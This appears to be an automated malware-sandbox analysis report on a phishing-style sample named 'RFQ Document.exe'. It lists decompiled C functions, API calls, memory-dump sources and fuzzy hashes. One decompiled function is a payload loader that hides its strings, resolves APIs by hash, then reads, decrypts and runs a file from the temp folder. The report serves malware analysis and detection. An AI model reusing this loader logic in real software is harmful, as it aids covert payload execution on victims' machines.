0x6fd8c325
0x6fd8c32c
0x6fd8c336
0x6fd8c33b
0x6fd8c33e
0x6fd8c341
0x6fd8c344
0x6fd8c347
0x6fd8c34e
0x6fd8c358
0x6fd8c365
0x6fd8c371
0x6fd8c37a
0x6fd8c38c
0x6fd8c38d
0x6fd8c391
0x6fd8c397
0x6fd8c39b
0x6fd8c39c
0x6fd8c39f
0x6fd8c362
0x6fd8c362
0x6fd8c3a6
0x6fd8c3a8
0x6fd8c3ad
0x6fd8c3b7
0x6fd8c3b8
0x6fd8c3bb
0x6fd8c3c2
0x6fd8c3c9
0x6fd8c3cf
0x6fd8c3d2
0x6fd8c3e7
0x6fd8c3f1
0x6fd8c3f8
0x00000000
0x6fd8c3ff
0x00000000
0x6fd8c3fc
0x00000000
0x6fd8c3eb
0x00000000
0x6fd8c3c6
0x00000000
0x6fd8c352
0x00000000
0x6fd8c330
0x6fd8c2ea
0x6fd8c2f3
0x00000000
0x00000000
0x6fd8c2fb
0x6fd8c302
0x00000000
0x00000000
0x00000000
0x6fd8c306
0x00000000
0x6fd8c2d3
0x00000000
0x6fd8c2af
0x00000000
0x6fd8c28c
0x00000000

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 6FD8C283
GetThreadContext.KERNELBASE(?,00010007), ref: 6FD8C2A6

Strings

D, xrefs: 6FD8C20C

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: ContextCreateProcessThread
String ID: D
API String ID: 2843130473-2746444292
Opcode ID: 4056901e2498ce4c375ee6b341e5419708dd51e730d8872eee124bc096a14036
Instruction ID: 8adbeb2a31e9c74c466b227e057e2d31b902f341169733e108bee2e62e98f00d
Opcode Fuzzy Hash: 4056901e2498ce4c375ee6b341e5419708dd51e730d8872eee124bc096a14036
Instruction Fuzzy Hash: 96A1D575E44209EFDB80DFA8C980BEEBBB5AF08704F104565E525EB290D735BA42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405EE9, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EE9(intOrPtr _a4) {
				char _v292;
				int _t10;
				struct HINSTANCE__* _t14;
				void* _t16;
				void* _t21;

				_t10 = GetSystemDirectoryA( &_v292, 0x104);
				if(_t10 > 0x104) {
					_t10 = 0;
				}
				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
					_t16 = 1;
				} else {
					_t16 = 0;
				}
				_t5 = _t16 + 0x409010; // 0x5c
				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
				return _t14;
			}

0x00405f00
0x00405f09
0x00405f0b
0x00405f0b
0x00405f0f
0x00405f21
0x00405f1b
0x00405f1b
0x00405f1b
0x00405f25
0x00405f39
0x00405f4d
0x00405f54

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
wsprintfA.USER32 ref: 00405F39
LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D

Strings

UXTHEME, xrefs: 00405EF2
%s%s.dll, xrefs: 00405F33
\, xrefs: 00405F11

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
Instruction ID: fa246daef39c5d1266dc05b53ca8af7bf1dea281c1fa5b10d5a6498bb1fbd0ec
Opcode Fuzzy Hash: 95ac327f182d4f2ec24d2199b65981d3e05ead90002209c0018270c035d5f6e2
Instruction Fuzzy Hash: AAF0F63094050A6BDB14AB64DC0DFFB365CFB08305F1404BAB646E20C2E678E9158FAD

Uniqueness

Uniqueness Score: -1.00%

Function 004058CD, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058CD(char _a4, intOrPtr _a6, CHAR* _a8) {
				signed int _t11;
				int _t14;
				signed int _t16;
				void* _t19;
				CHAR* _t20;

				_t20 = _a4;
				_t19 = 0x64;
				while(1) {
					_t19 = _t19 - 1;
					_a4 = 0x61736e;
					_t11 = GetTickCount();
					_t16 = 0x1a;
					_a6 = _a6 + _t11 % _t16;
					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
					if(_t14 != 0) {
						break;
					}
					if(_t19 != 0) {
						continue;
					}
					 *_t20 =  *_t20 & 0x00000000;
					return _t14;
				}
				return _t20;
			}

0x004058d1
0x004058d7
0x004058d8
0x004058d8
0x004058d9
0x004058e0
0x004058ea
0x004058f7
0x004058fa
0x00405902
0x00000000
0x00000000
0x00405906
0x00000000
0x00000000
0x00405908
0x00000000
0x00405908
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004058E0
GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004058FA

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004058D0, 004058D4
"C:\Users\user\Desktop\RFQ Document.exe" , xrefs: 004058CD
nsa, xrefs: 004058D9

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\RFQ Document.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-2257281772
Opcode ID: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
Instruction ID: 53182d5486abb24f79a58d6e85a6b3ecacc509e50e1b88e8db4ee69f85448782
Opcode Fuzzy Hash: 0450f55a1c395314d18141c5bfd7e62b2554956accf044952057d9506f78994b
Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 6FD8B070, Relevance: 7.7, APIs: 5, Instructions: 187
fileCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6FD8B070() {
				intOrPtr _v8;
				signed int _v12;
				void* _v16;
				void* _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				short _v40;
				short _v42;
				char _v44;
				short _v46;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				char _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				long _v116;
				short _v1156;
				short _t80;
				short _t81;
				short _t82;
				short _t83;
				short _t84;
				short _t85;
				short _t86;
				short _t87;
				short _t88;
				short _t89;
				short _t90;
				short _t105;
				short _t106;
				short _t107;
				short _t108;
				short _t109;
				short _t110;
				short _t111;
				short _t112;
				short _t113;
				short _t114;
				short _t115;
				short _t116;
				short _t117;
				void* _t125;
				signed int _t126;
				void* _t127;
				int _t129;
				void* _t132;

				_t80 = 0x53;
				_v44 = _t80;
				_t81 = 0x68;
				_v42 = _t81;
				_t82 = 0x6c;
				_v40 = _t82;
				_t83 = 0x77;
				_v38 = _t83;
				_t84 = 0x61;
				_v36 = _t84;
				_t85 = 0x70;
				_v34 = _t85;
				_t86 = 0x69;
				_v32 = _t86;
				_t87 = 0x2e;
				_v30 = _t87;
				_t88 = 0x64;
				_v28 = _t88;
				_t89 = 0x6c;
				_v26 = _t89;
				_t90 = 0x6c;
				_v24 = _t90;
				_v22 = 0;
				_v12 = _v12 & 0x00000000;
				_v8 = E6FD8B737();
				_v80 = E6FD8B7E6(_v8, 0x7fc01dae);
				_v112 = E6FD8B7E6(_v8, 0xff7f721a);
				_v76 = E6FD8B7E6(_v8, 0x7fd6a366);
				_v84 = E6FD8B7E6(_v76( &_v44), 0x7f5a653a);
				_v108 = E6FD8B7E6(_v8, 0x7f91a078);
				_v88 = E6FD8B7E6(_v8, 0x7fe63623);
				_v92 = E6FD8B7E6(_v8, 0x7fbd727f);
				_v96 = E6FD8B7E6(_v8, 0x7fb47add);
				_v100 = E6FD8B7E6(_v8, 0x7fe7f840);
				_t142 = _v8;
				_v104 = E6FD8B7E6(_v8, 0x7fe1f1fb);
				_t105 = 0x74;
				_v72 = _t105;
				_t106 = 0x72;
				_v70 = _t106;
				_t107 = 0x68;
				_v68 = _t107;
				_t108 = 0x66;
				_v66 = _t108;
				_t109 = 0x63;
				_v64 = _t109;
				_t110 = 0x68;
				_v62 = _t110;
				_t111 = 0x6d;
				_v60 = _t111;
				_t112 = 0x33;
				_v58 = _t112;
				_t113 = 0x77;
				_v56 = _t113;
				_t114 = 0x7a;
				_v54 = _t114;
				_t115 = 0x75;
				_v52 = _t115;
				_t116 = 0x77;
				_v50 = _t116;
				_t117 = 0x37;
				_v48 = _t117;
				_v46 = 0;
				_v80(0x103,  &_v1156);
				_v84( &_v1156,  &_v72);
				_t125 = CreateFileW( &_v1156, 0x80000000, 7, 0, 3, 0x80, 0);
				_v20 = _t125;
				if(_v20 != 0xffffffff) {
					_t126 = _v92(_v20, 0);
					_v12 = _t126;
					if(_v12 != 0xffffffff) {
						_t127 = VirtualAlloc(0, _v12, 0x3000, 4);
						_v16 = _t127;
						if(_v16 != 0) {
							_t129 = ReadFile(_v20, _v16, _v12,  &_v116, 0);
							if(_t129 != 0) {
								FindCloseChangeNotification(_v20);
								_v16 = E6FD8BA6A(_t142, _v16, _v12);
								_t132 = E6FD8BE17(_v16); // executed
								ExitProcess(0);
							}
							return _t129;
						}
						return _t127;
					}
					return _t126;
				}
				return _t125;
			}

0x6fd8b858
0x6fd8b859
0x6fd8b85f
0x6fd8b860
0x6fd8b866
0x6fd8b867
0x6fd8b86d
0x6fd8b86e
0x6fd8b874
0x6fd8b875
0x6fd8b87b
0x6fd8b87c
0x6fd8b882
0x6fd8b883
0x6fd8b889
0x6fd8b88a
0x6fd8b890
0x6fd8b891
0x6fd8b897
0x6fd8b898
0x6fd8b89e
0x6fd8b89f
0x6fd8b8a5
0x6fd8b8a9
0x6fd8b8b2
0x6fd8b8c2
0x6fd8b8d2
0x6fd8b8e2
0x6fd8b8f8
0x6fd8b908
0x6fd8b918
0x6fd8b928
0x6fd8b938
0x6fd8b948
0x6fd8b950
0x6fd8b958
0x6fd8b95d
0x6fd8b95e
0x6fd8b964
0x6fd8b965
0x6fd8b96b
0x6fd8b96c
0x6fd8b972
0x6fd8b973
0x6fd8b979
0x6fd8b97a
0x6fd8b980
0x6fd8b981
0x6fd8b987
0x6fd8b988
0x6fd8b98e
0x6fd8b98f
0x6fd8b995
0x6fd8b996
0x6fd8b99c
0x6fd8b99d
0x6fd8b9a3
0x6fd8b9a4
0x6fd8b9aa
0x6fd8b9ab
0x6fd8b9b1
0x6fd8b9b2
0x6fd8b9b8
0x6fd8b9c8
0x6fd8b9d6
0x6fd8b9f2
0x6fd8b9f5
0x6fd8b9fc
0x6fd8ba05
0x6fd8ba08
0x6fd8ba0f
0x6fd8ba1f
0x6fd8ba22
0x6fd8ba29
0x6fd8ba3c
0x6fd8ba41
0x6fd8ba48
0x6fd8ba56
0x6fd8ba5c
0x6fd8ba63
0x6fd8ba63
0x00000000
0x6fd8ba41
0x00000000
0x6fd8ba29
0x00000000
0x6fd8ba0f
0x00000000

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FD8B9F2

Memory Dump Source

Source File: 00000001.00000002.674476668.000000006FD8B000.00000040.00020000.sdmp, Offset: 6FD80000, based on PE: true

Associated: 00000001.00000002.674409243.000000006FD80000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674416889.000000006FD81000.00000020.00020000.sdmp Download File
Associated: 00000001.00000002.674432507.000000006FD89000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.674450695.000000006FD8A000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674530569.000000006FD8D000.00000080.00020000.sdmp Download File
Associated: 00000001.00000002.674578918.000000006FD8E000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c5b362445c0280fbcb00587e625dd7a569583d8638017c95e7cfee28ef9ae5f0
Instruction ID: e566dca379cf3ef218d47d160c73115aecd6a71d687addde6cf8bff6c9008797
Opcode Fuzzy Hash: c5b362445c0280fbcb00587e625dd7a569583d8638017c95e7cfee28ef9ae5f0
Instruction Fuzzy Hash: D5616C35E54348EEDB90CBE4ED51BEDB7B5AF48B10F20441AE528FA2E0E7706A40DB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401F84, Relevance: 6.1, APIs: 4, Instructions: 73
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401F84(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ecd8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A29(0xfffffff0);
				 *(_t34 + 8) = E00402A29(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EB3(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}

0x00401f84
0x00401f84
0x00401f89
0x00401f90
0x0040204c
0x00402197
0x00402197
0x004028be
0x004028c1
0x004028cd
0x004028cd
0x00401f9f
0x00401fa9
0x00401fac
0x00401fbb
0x00401fbf
0x00401fc5
0x00401fc9
0x00402045
0x00000000
0x00402045
0x00401fcb
0x00401fd5
0x00401fd9
0x0040201d
0x00401fdb
0x00401fde
0x00401fe1
0x00402011
0x00401fe3
0x00401fe6
0x00401fef
0x00401ff1
0x00401ff1
0x00401fef
0x00401fe1
0x00402025
0x0040203a
0x0040203a
0x00000000
0x00402025
0x00401faf
0x00401fb5
0x00401fb9
0x00000000
0x00000000
0x00000000

APIs

GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF

Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041988C,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041988C,73BCEA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041988C,73BCEA30), ref: 00404F0F
Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F

LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
GetProcAddress.KERNEL32(00000000,?), ref: 00401FCF
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E

Uniqueness

Uniqueness Score: -1.00%

Function 004015B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E004015B3(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402A29(0xfffffff0);
				_t13 = E0040574E(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E004056E5(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E004053F2(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405375(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00405BC7("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}

0x004015b3
0x004015ba
0x004015bd
0x004015c2
0x004015c6
0x004015c8
0x004015d0
0x004015d2
0x004015d4
0x004015d8
0x004015db
0x004015f3
0x004015f4
0x004015dd
0x004015dd
0x004015e0
0x00000000
0x004015eb
0x004015ec
0x004015ec
0x004015e0
0x004015fb
0x00401602
0x0040160f
0x0040160f
0x00401604
0x00401605
0x0040160d
0x00000000
0x00000000
0x0040160d
0x00401602
0x00401612
0x00401615
0x00401617
0x00401618
0x004015c8
0x0040161f
0x0040164a
0x00402197
0x00401621
0x00401623
0x0040162e
0x00401634
0x0040163c
0x00401642
0x00401642
0x0040163c
0x004028c1
0x004028cd

APIs

Part of subcall function 0040574E: CharNextA.USER32(00405500,?,0042B4A8,00000000,004057B2,0042B4A8,0042B4A8,?,?,?,00405500,?,C:\Users\user\AppData\Local\Temp\,?), ref: 0040575C
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605

Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00401629

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 1892508949-47812868
Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F

Uniqueness

Uniqueness Score: -1.00%

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				intOrPtr _t15;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t15 =  *0x42ec50; // 0x765dbc
					_t6 = _t17 * 0x1c + _t15;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42e40c =  *0x42e40c + _t12;
						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x00401392
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(00000020,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F57, Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F57(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x409208);
				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
				}
				_t5 = E00405EE9(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00405f5f
0x00405f62
0x00405f69
0x00405f71
0x00405f7d
0x00000000
0x00405f84
0x00405f74
0x00405f7b
0x00000000
0x00405f8c
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
GetProcAddress.KERNEL32(00000000,?), ref: 00405F84

Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040589E, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0040589E(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x004058a2
0x004058af
0x004058c4
0x004058ca

APIs

GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\RFQ Document.exe,80000000,00000003), ref: 004058A2
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
